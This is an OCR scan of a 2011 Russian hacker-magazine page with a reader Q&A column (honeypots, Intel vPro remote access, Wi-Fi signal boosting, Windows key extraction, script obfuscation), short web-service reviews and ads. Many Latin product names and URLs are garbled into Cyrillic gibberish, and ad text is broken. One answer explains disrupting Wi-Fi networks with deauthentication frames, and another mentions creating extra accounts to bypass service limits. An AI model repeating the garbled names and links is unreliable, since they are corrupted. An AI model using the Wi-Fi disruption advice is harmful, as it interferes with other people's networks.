собственные Попеурот ы, как это делают 
антивирусные компании. Это сеть из наме- 
ренно уязвимых хостов, которые сбольшой 
вероятностью будут атакованы малварью. 


О: Так, акактакие хонипоты 

поднять самому? 

Д: Если говорить начистоту, то для сбора 
образцов вирусов на 100% не подходитни 
один существующий проект. Но можно по- 
пробовать следующие: 

® Саз{ор!(аа<орЁога] — это веб- 
приложение, которое эмулируеттысячи 
различных веб-уязвимостей для сбора 
различных данных и информации о прово- 
димой атаке. Среди этих данных легко могут 
оказаться и образцы малвари. 

® О!опава ([Ч!опаеа.сагп\оге.(] — специ- 
альный хонипот, заточенный для сбора 
образцов зловреда. Для этого решение 
эмулирует различные бреши безопасности в 
различных службах \\/пЧо\м/з, которые часто 
используются для заражения системы. 


О!опаеа реализован довольно здорово 

и даже умеет эмулировать исполнение 
шеллкода. 

® /зипраск-п [соде.доод(е.соп/р/зипраск-п] 
— этот хонипот работает на стороне клиента 
и эмулируетуязвимый браузер. Утилита 
спроектирована таким образом, чтобы взаи- 
модействовать с зараженным веб-сайтом в 
автоматическом режиме. 

Есть и много других проектов, напри- 
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О:Каким способом можно обеспечить 
себе возможность подключения к удален- 
ному рабочему столу, даже если он завис 
или выключен? 

А: Еще недавноя не мог ответить на этот 
вопрос, но теперь хочу рассказать тебе об 
одной чумовой фишке, которая появилась 
в новых процессорах [п{е! Соге 15/17. На- 
чиная с этой серии процов, компания [п{(е| 
представила платформу УРго и технологию 
КУМ Кетое Соп(го[. Аббревиатура К\УМ 
(Кеубоага М 4ео Моизе] возможно тебе уже 
знакома: КУМ-переключатели часто ста- 
вятся в серверных и позволяют управлять 
нескольким компьютерами с одних и тех же 
— клавиатуры, мыши и монитора. Что озна- 
чает появление К\/М в платформе |п{е[? 
То, что ты можешь управлять компьютером 
независимо оттого, в каком состоянии он 
находится. Даже если он завис или вообще 
выключен, к нему можно подключиться 

и, получив изображение с видеокарты, 
разрулить любую ситуацию. Привлека- 
тельность технологии добавляеттот факт, 
что для удаленного доступа используется 
знакомый протокол Кетцще ЕгатеВиНег 
[более известный как УМС), а, значит, 

есть сотни самых разных клиентов для 
любых, втом числе мобильных платформ. 
Управлять компьютером слюбого смарт- 
фона натом же Апаго!а, кактебе? И это 

на полностью аппаратно реализованной 
технологии. Если компьютер ты приобрел 
недавно, не исключено, что эта радость в 
твоем процессоре уже есть. Уточнить это 
можно в специальном разделе на сайте 
[пе (г(еЦу/раТибМ), в котором приведен 
список совместимых с УРго процов. Обрати 
внимание на графу «КУМ Кетсое Соп1го| 
Биррог». Но сразу предупреждаю: опция 
будет работать, только если ты исполь- 


зуешь интегрированные видеоадаптер и 
сетевую карту. 


О: Можно ли как-нибудь увеличить 
уровень \\/-Н-сигнала отточки доступа? 
В одной из отдаленных комнат прием 
нестабильный и хотелось бы как-нибудь 
исправить эту ситуацию. Предложи 
варианты. 
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Увеличиваем мощность передатчика 
точки доступа 


А: 1. Выбросить стандартную антенну и при- 
обрести более мощную всенаправленную 
[ищи по ключевым словам огпп! ап{еппа). 

2. Попробовать обойтись без лишних за- 
трат и решить вопрос исключительно на 
софтварном уровне. Для большинства точек 
доступа существуют альтернативные про- 
шивки, например, ОО0-\М/КТ, предлагающие 
гораздо больше настроек в сравнении со 
стандартным интерфейсом управления. 
Если перейти на вкладку «\\Мгаез$ = 
Адуапсеа 5е тд$», то несложно заметить 
там параметр «ТХ Ро\мег», указывающий 
мощность передатчика. Стандартное 
значение, как правило, равняется 70, но его 
вполне можно незначительно увеличить 

до 100 [умельцы уверяют, что это вполне 
безопасно}. Дальнейшее увеличение грозит 
чрезмерным тепловыделением, что чревато 
для здоровья роутера. Хотя на своей АРя 
выставил значение 150 и никаких проблем 
пока не заметил. Поддерживаетли твоя 
точка ОО-\/КТ, можно уточнить на сайте 
разработчика (Мл. Ч9-миг. согп]. 

3. Помимо твика сувеличением мощности 
передатчика рекомендую поиграться с 
каналом, на котором работает точка доступа. 
Достаточно запустить любой сканер \\1-Е1- 
сетей (например, п55!Оег] и посмотреть, 
какой из каналов в помещении еще неис- 
пользуется другими сетями. На него и надо 
переключиться. 

4. Если и это не помогает, то самый верный 
способ — приобрести еще одну АР [благо 
цены на них все падают и падают] и пере- 
вести ее в режим повторителя. Последнее 
делается очень просто. В случае с прошив- 
кой ОО-\/КТ достаточно перейти в раздел 
«\\Мге[е$5 -» Вас Зе таз» и поменять ре- 
жим работы на «Кереа(ег». Гы увидишь две 
секции: «\\Мге!е$$ РВуз!са!( п{егасе [м0] 

и «Миа г(егасез 0.1}. Физический 
интерфейс должен принимать сигнал от 
главного роутера, поэтому укажи 5510 своей 
основной беспроводной сети. В разделе 
«\Мгее5$ 5есигКу» необходимо настроить 
параметры подключения. 
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О: Аесть ли способы заддосить беспро- 
водную сеть? Сделать так, чтобы пользо- 
ватьсяей стало невозможно. 

Д: Факт использования общей среды, то 
есть, радиоэфира, создает для любой бес- 
проводной технологии ряд сложностей. В 
случае с М -Е!, какмы знаем, ничего не стоит 
создать фрейм деавторизации и отключить 
любого клиента отточки доступа. Уже даже 
это может быть использовано злоумышлен- 
ником, чтобы серьезно помешать работе 
беспроводной сети. Есть уязвимости и в 
оборудовании. Я говорю о ситуации, когда 
девайсы неправильно отрабатывают ситуа- 
ции с намеренно неправильно созданными 
беспроводными фреймами. Недавно даже 
появился проект МИЕи?2 (соде.доод(е.согп/р/ 
млву72], представляющий собой фаззер, на- 
меренно создающий сложные ситуации для 
сетевого стека современныхточек доступа. 
В его основе лежит Ру{Поп-библиотека 
5сару, позволяющая конструировать произ- 
вольные сетевые пакеты. 


О: Попросили переставить винду на ноут- 
буке. Система лицензионная, но наклейки 
на обратной стороне девайсауже нет. 

Не хочется устанавливать пиратку. 

Как вытащить серийник из системы? 

Д: Проще всего заюзать утилиту РгодиКеу 
[улллм/.пг5оК.пе!), которая как раз и из- 
влекает из системы ключи для продуктов 
Мисго5о В Осе, \Лп9оми$, Ехспапде 5егуег 
и 5ОЕ 5егуег. Готже самый трюк несложно 
провернуть с удаленной и даже нерабочей 
системой [а это бывает сплошь и рядом). 
Главное — добраться до папки %\ипаи%\ 
5у5{ет32\сопйод. 


О: Хочу с друзьями развернуть что-то 
вроде Огорбох"а, но только на своем соб- 
ственном сервере. Чтобы уж точно быть 
уверенным в неприкосновенности дан- 
ных. Есть ли толковые готовые решения? 
Д: Самым мощным клоном Огорбох'а явля- 
ется 5рагк(ебВаге [5рагк(езВаге.ога). Он во 
многом повторяет функционал известного 
сервиса, но при этом распространяется с 
открытыми исходными кодами. Уже сейчас 
разработчики предлагают клиенты для Ипих 
и Мас, а скоро обещают выпустить релиз для 
винды и мобильных платформ. Исходные 
коды всегда доступны с репозитория (пу. 


сот/пБоп$/брагкебВаге. 


О:Пишу на Ро\ммег5пе!/ВАТ небольшие 
вспомогательные скрипты для решения 
рутинных задач. Хочу, чтобы по заверше- 
нии некоторых действий в окне уведом- 
лений Ипдом/$ появлялись всплывающие 
сообщения, отражающиетекущий статус 
выполнения задачи. Как это можно 
сделать? 

Д: Отобразить всплывающие сообщения в 
области трея можно было бы через \пАР1, 
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но делать такие вызовы из скриптовых 
языков — это то еще извращение. Быстро и 
изящно решить проблему способна неболь- 
шая консольная утилита пои [млллм.рагаЦ о. 
сопп/рго]ес{5/по{ц]). Тыпередаешьей 
необходимые параметры через командную 
строку, а она уже отображает уведомление в 
трее, используя необходимые системные вы- 
зовы. Например, так: 


поЕ1Фи /т "Не11о, тап!" 


Получается, что для вывода сообщений нам 
достаточно вставить вызов пои в нужных 
местах нашего сценария. 


О: Есть ли способ зашифровать содержи- 
мое ВА1-файла? Не хочу, чтобы действия, 
которые он выполняет, легко читались 
простым открытием его в блокноте. 
Вопрос актуален также для сценариев 

на Ромиегьсир! и УВЗсиру. 

А: Если не брать в расчет различные спосо- 
бы обфускации, то, пожалуй, самый верный 
способ — преобразовать его в исполняемый 
ехе-файл. Например, с помощью утилиты 
Сиск Ва{сВ ЕЦе СотрЦег (млллм.абуз®гпе(Та. 
сого/аискЬ!©]. Для скриптов на УВ5спри и 
]ауа5спрт есть 5смр*Сгур{ог СотрЦег от 
того же разработчика. В случае если нужно 
провернуть тот же фокус со скриптом на мод- 
ном нынче Ромегьспру, пригодится утилита 
Маке-Р$1Ехе\\/гаррег ([Б\.у/ра!9 ММ. Под- 
ходящая опция предлагается еще и в среде 
разработки Рг/ипа[5сг!р{ (млм. зар!еп.согп/ 
5оН\миаге/ргита($сг!р\), которая помимо про- 
чего может похвастаться весьма недурными 
инструментами для отладки. 


О: Счего лучше всего начать юзабилити 
(слово-то какое!) существующего веб- 
приложения? 

А: Если ресурс уже запущен и работает, 

то самую лучшую пищу для размышления 
могут предоставить сами посетители. 
Вместе со страницей можно подгружать 
небольшой код на /]фауа5сгир\, который 
будет отслеживать каждый клик пользо- 
вателя и проводить небольшой анализ. На 
основании этих данных можно построить 
так называемые Пеа{тар’ы — графики, 
наложенные на скриншот сайта и показы- 
вающие «горячие» и «холодные» зоны. Чем 
больше кликов было сделано в какой-то 
конкретной области, тем ярче отмечается 
пятно на графике. Благодаря такой визуа- 
лизации несложно определить наиболее 
удачные элементы в интерфейсе, а также 
откровенно слабые места, которые пользо- 
вателями по какой-то причине игнорируют- 
ся. В качестве конкретного решения могу 
посоветовать СИсКНеа{ (млм [аб згпеба. 
согп/сискВеа{. Статистику по кликам также 
предоставляет бесплатные сервисы бооце 
Апа!Уйс$ и Яндекс. Метрика. 


О: Возможно ЛИ одновременно ис- 
пользовать несколько аккаунтов СМай в 
одном браузере, и быстро между ними 
переключаться? Сейчас для того, чтобы 
не геморроиться со вхоДОмМ/ВыхХодДоМ ИЗ 
аккаунта, я использую разные браузе- 
ры. Надо ли говорить, что это не сильно 
удобно? :] 

Д: Можно! И если раньше для этого при- 
ходилось использовать дополнительные 
плагины для браузеров, позволяющих 
быстро переключать сессии, то теперь 
такая возможность предоставляется самим 
СооЧце ом. 

Немногие знают, но множественный вход 
(так называемые Мир(е °!9п-т] в два 
клика включается в настройках профиля. 
Надо лишь заглянуть на страницу дооч(е. 
согп/ассоцп{5. Правда, боод(е честно 
предупреждает, что опция пока доступна не 


для всех сервисов. 


О: Задача — реализовать на сай- 

те удобный механизм для загрузки 
файлов через веб-интерфейс. С нуля 
писать неохота, подскажите наиболее 
универсальное решение, которое точно 
бы работало в любом современном 
браузере. 

Д: Хорошее решение — использовать 
библиотеку Ршироад [Млммм.рирФа9.согп), 
которая поддерживает массу фишек вроде 
загрузки файлов кусочками, агад’п’агор, 
передачи нескольких документов одно- 
временно, красивого отображения хода 
загрузки ит.д. 

Для передачи данных используются разные 
технологии, в том числе, конечно же, НТМЕ5. 
Если у пользователя браузер не поддержи- 
ваетновшества НТМ(., библиотека автома- 
тически использует другой способ загрузки: 
Е азВ, Сеаг$, ЭЦмегИай\, Вгом5егРи$ или 
НТМЕ4. Причем приоритет способов загруз- 
ки можно изменить в конфиге. 


О: Наткнулся в Сети на интересный стар- 
тап, который помимо веб-интерфейса 
предлагает воспользоваться приложе- 
нием для платформы Апагон. Но хоть 
убей не могу понять: в моем Апагоа 
МагкеГге такого приложения нет! 

Как это может быть? 

Д: Очень просто. Дело в том, что каждый 
разработчик при добавлении приложения 
в Апаго! Магке{ выбирает, для каких ре- 
ГИОНОВ ОНО будет ДОСТУупно. И очень часто 
случается так, что в нашем российском 
Апаго!а Магкеге некоторых интересных 
разработок не оказывается. К счастью, 
МОЖНО проспуфить используемый регион и 
таким образом достучаться до магазинов 
приложений других стран. Проще всего 
это сделать с помощью утилиты МагКе!{ 
епа (ег (соде.доод(е.сопт/р/пагке-епаБег). 
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Для быстрой загрузки 
—— сфайлообменников 


ГЕТСН.Ю 


тасП.Ю 


© О том, сколько времени придется подождать и сколько денегпридется 
заплатить за рекламу, прежде чем загрузить файл с файлообменника 
вроде КарзВаге, рассказывать не надо. Если речь идето несколь- 

ких больших файлах (например, разбитом на 100-мегабайтные части 
образе какого-то диска], то легче сразу пристрелиться. Конечно, есть 


программы вроде /Оо\/поадег ([Чо\/пюадег.ога), которые терпеливо 
подождут окончания всех таймеров и даже попробуют сами распознать 
и ввести САРТСНА, чтобы скачать файл, но это лишь частично облегчает 
жизнь. Теперь же есть 100%-ное лекарство. Сервис Те{сВ.го быстро [оче- 
видно, с использованием платных Ргептиит-аккаунтов] выкачает для 
тебя файлы с различных файлообменников ([Резрозез, Рар!ЧзВаге, 
МедаИроад ит.п.} идаже Р2Р-сетей (пока только ВИТоггеп{ и предо- 
ставит их для загрузки на очень быстром канале. Количество гигабайт, 
которые можно скачать на бесплатном аккаунте, ограничено, но за 
созданием новыхучеток никто не следит. 


Для ограничения посещений 
определенных сайтов 


КЕЕРМЕОСТ! 


Кеертеоц.сот 


©Если сосчитать все то количество времени, которое мы проводим в 
социальных сетях за год, можно только удивляться, сколько строчек кода 
можно было написать и новых иностранных слов выучить. Ограничить 
тупое времяпрепровождение в ГасероокК'е, в контакте и вообще на 
любых сайтах, которые многие посещаютуже по какой-то дебильной 
привычке, призван проект КеерМе[и!!. Для каждого такого ресурса он 
создает закладку, которая выступает вроде своеобразной прокси. Когда 
ты пробуешь зайти на сайтчерез такой букмарк, КеерМе0Ои! проверяет, 
не было ли на него посещений втечение последних 60 минут. Если свой 
лимитисчерпал, то вместо целевой страницы тебе отобразится нагляд- 
ная статистика и графики посещений этого ресурса. Включи силу воли и 
не заходи на нужный сайт напрямую. Кстати, сайтукопаКе.ги занимает 
в хитпараде КеерМе(и! почетное 6-е место. 
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Для анонимной и зашифрованной 
переписки через инет 


СКУРТОСАТ 


сгурю.са! 


© Приватность общения — один из ключевых вопросов безопасности 


в инете. Пока гики прикручиваютк своим мессенджерам плагины для 
шифрования через специально созданный протокол ОТК (ОН-{Ше- 
Весога], создатели сервиса сгур{оса{ предлагают всем простой, но вто 
же время надежный способ безопасно чатиться в Сети. Идея заклю- 
чается в симметричном шифровании сообщений на стороне клиента 

(с использованием /ауа5сг р и браузера]. Уходящие в чат-комнату 
сообщения предварительно шифруются с использованием АЕЗ$-256 и 
указанного пользователем ключа. Другие участники разговора смогут 
прочитать их, только если сами правильно введуттот же самый ключ. Пе- 
реписка надежно удаляется через 30 минут отсутствия активности, а сам 
сервис работает с постоянным 551 -шифрованием. Если не доверяешь 
владельцам сгур{оса\{, то можешь сам поднять подобный сервис, пред- 
варительно изучив исходники с СИНи6 (9 ВиБ. сог/Каерога/сгур{оса{. 


Площадка для 
обсуждения и 
пожертвования 
денег на самые 
разные проекты 


КСКЪТАКТЕК 


мимим/. Кск$атег.сот 


© Это не какой-то полезный сервис, нет. Это площадка, гдеты можешь 
найти поддержку для любой, пускай даже самой безумной идеи. Замечу, 
поддержку не абы какую, а самую важную — финансовую! Любой человек 
может выложить описание проекта в одной из категорий (музыка, фильм, 
искусство, технология, дизайн, еда, публикации] и обозначить количе- 
ство денежных средств, которые ему необходимо для его реализации. 
Сайт имеет огромную аудиторию так называемых бейкеров, которые 
активно поддерживают проект рублем или, вернее говоря, баксами. 

В некоторых случаях активность зашкаливает. Например, для про- 

екта по созданию ультраяркого фонаря с невероятной силой светового 
потока 500 люменов (мил. ПехЬга в". согп} автор ставил целью собрать 


$31 000. Обещанный фонарь в качестве бонуса, однако, привлектакое 
количество желающих поделиться денежками, что в настоящий момент 
собрано пожертвований уже на сумму $259,293. Неплохо, правда? 


ХАКЕР 09 /152/ 2011 


_ Получать СКИДКИ \ у 
в барах, ресторанах и. > вы 
магазинах твоего \ ха 


ре а, ый у, 
"Участвовать в акциях 
’и посещать закрытые “зи " и 
` мероприятия ДлЯ держателей «Мужской Карты» вы 
ый) 


т алять своими счетами, используя систему . 


интернет-банка «Альфа-Клик» ты р 
#7”. 


Оформлять подписку на журнал «Авкер». 
* со скидкой 50% 


тел. подписки (495)-663-82-77 | пор.а!с:ги 


: | ми мы или кредитную «Мужскую карту» можно в отделениях | 
| ОАО «Альфа-Банка», а так же заказав по телефонам: м 
‚455 229-2222 в Москве | 8-800-333-2-333 в ион АА (звонок бесплатный) 


ей 


АХ! м А Альфа-Банк 


а ЖУРНАЛ С МНЕНЕН 


Е“ 


ЗАМЗУМС 


527А550Н 


ч 7 


Яркий дизайн в центре внимания 


[3 ыы —_] мониторы Затзипа 


® Разрешение ЕийНО 

® Время отклика 2 мс (С1С)* 

® Контрастность МЕСА ОСВ 

® Малое энергопотребление 

® Датчик яркости 

® Датчик присутствия пользователя** 


$24А300ВЕ 527АЗБЬОН * кроме моделей $АЗ00 **только для моделей $А550 


Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный). 
млм. затзипо.сот. Товар сертифицирован. Реклама. 


